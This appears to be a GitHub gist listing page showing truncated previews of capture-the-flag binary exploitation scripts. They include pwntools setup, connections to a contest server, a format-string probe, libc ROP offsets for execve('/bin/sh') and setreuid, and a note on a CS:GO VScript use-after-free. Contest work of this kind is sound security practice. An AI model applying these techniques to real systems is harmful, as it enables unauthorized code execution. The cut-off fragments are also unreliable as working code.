Discord flag.
Brute force byte-by-byte and apply encrypt function to verify.
from pwn import *
Bien Pham kungfulon
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| context.update(os='linux', arch='amd64') | |
| r = process('./minho') | |
| l = ELF('/lib/x86_64-linux-gnu/libc.so.6') | |
| def new(size, data, abuse_scanf=0): | |
| r.sendlineafter(b'> ', b'1') | |
| r.sendlineafter(b': ', b'0' * abuse_scanf + str(size).encode()) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdarg.h> | |
| #include <string.h> | |
| #include <fcntl.h> | |
| #include <unistd.h> | |
| #include <sys/mman.h> | |
| #define INFO "[*] " |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| import struct | |
| import sys | |
| libc = int(sys.argv[1], 16) - 0x270b3 | |
| setreuid = 0x117ab0 | |
| execve = 0xe62f0 | |
| binsh = 0x1b75aa | |
| poprdx = 0x11c371 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import * | |
| context.clear(arch='amd64', os='linux', endian='little') | |
| r = remote('125.235.240.166', 33333) | |
| # 1st boss | |
| r.sendline(b'%p') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import * | |
| context.clear(arch='amd64', os='linux', endian='little') | |
| libc = ELF('./libc-2.31.so') | |
| MY_IP = b'' | |
| r = remote('125.235.240.166', 20120) |
This challenge involves an old version of CS:GO VScript, which is vulnerable to a UAF bug and a type confusion bug.
The sort function of squirrel array is array_sort in sqbaselib.cpp, which will call _qsort:
// v: VM, o: array object, func: compare func
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import * | |
| context.os = 'linux' | |
| context.arch = 'amd64' | |
| context.terminal = ['tmux', 'new-window'] | |
| l = ELF('./libc-2.31.so') |
kungfulon
/ secret_keeper.py
Created
November 28, 2020 19:09
ASCIS 2020 Final - Secret Keeper (pwn01)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import * | |
| context.os = 'linux' | |
| context.arch = 'amd64' | |
| context.terminal = ['tmux', 'sp', '-v', '-p', '90'] | |
| b = ELF('./secret_keeper') | |
| l = ELF('/lib/x86_64-linux-gnu/libc-2.31.so') |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| from pwn import * | |
| context.os = 'linux' | |
| context.arch = 'amd64' | |
| b = ELF('./sandboxd') | |
| l = ELF('./libc-2.31.so') | |
| context.terminal = ['tmux', 'sp', '-h', '-p', '80'] |
NewerOlder